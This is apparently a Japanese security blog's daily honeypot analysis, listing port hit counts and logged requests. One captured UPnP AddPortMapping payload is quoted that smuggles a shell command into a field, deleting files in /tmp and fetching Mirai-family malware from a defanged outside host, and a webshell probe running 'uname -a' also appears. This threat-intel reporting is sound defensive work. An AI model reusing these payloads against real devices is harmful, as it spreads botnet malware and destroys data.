sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeypot簡易分析(301日目:6/13)

Honeypot簡易分析(301日目:6/13)になります。

◾️Honeytrap
※80ポートは除く

f:id:one-chick-sec:20190614195131p:plain


<宛先ポート別検知数(前日比)>

ポート番号 サービス 件数 前日比(%)
445 smb 3909 37
23 telnet 1207 127
5900 vnc 954 165
3389 rdp 227 -161
3306 mysql 193 -249
25 smtp 116 83
2323 telnet 77 -89
8443   51 50
5001 commplex-link 50 46
3307 opsession-prxy 48 0



<宛先ポート別検知数(30日平均比)>

ポート番号 サービス 件数 件数差(30日平均)
445 smb 3909 -79
23 telnet 1207 -417
5900 vnc 954 -4192
3389 rdp 227 -1135
3306 mysql 193 -45
25 smtp 116 -144
2323 telnet 77 -37
5007 Unknown 67 52
8443 Unknown 51 37
5001 commplex-link 50 31


大きな変化はありませんが、なぜか前日比と30日比の検知数が異なっています。Splunkのサーチ文が原因だと思いますが、ちょっと不明なので現在調査中です。

<新規マルウェア

マルウェアダウンロード ペイロード
hxxp://168[.]235[.]89[.]216/IDJAPbins[.]sh POST /picsdesc.xml HTTP/1.1
Content-Length: 639
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*
User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64
Connection: keep-alive

<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; rm -rf *; wget hxxp://168[.]235[.]89[.]216/IDJAPbins.sh`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>

最終的にダウンロードされるのはMirai系のマルウェアでした。
https://www.virustotal.com/gui/file/c6fb1af4bb96903e41fa140d7cb2c3df9cccbfd151dfd6c485a667634aabb5bf/detection

◾️WoWHoneypot

f:id:one-chick-sec:20190614201717p:plain

<検知パス一覧>

Path target CVE reference count
/ - - - 29
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 22
hxxp://110.249.212.46/testget Unauthorized Relay - - 4
/_search Elasticsearch CVE-2015-1427 https://www.morihi-soc.net/?p=442 1
/index.php - - - 1
/phpmyadmin/index.php phpMyAdmin - - 1
hxxp://160[.]16[.]145[.]183/ Unauthorized Relay - -

<新規検知ログ>

GET /shell?%75%6E%61%6D%65%20%2D%61 HTTP/1.1
Connection: Keep-Alive.Content-Type: application/x-www-form-urlencoded.Accept: */*.Accept-Language: zh-cn.Referer: http://160.16.145.183/shell?%75%6E%61%6D%65%20%2D%61
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
 

デコード後
GET /shell?uname -a

WebShellの調査行為だと思われます。

マルウェアダウンロード>
検知なし

以上、簡易分析となります。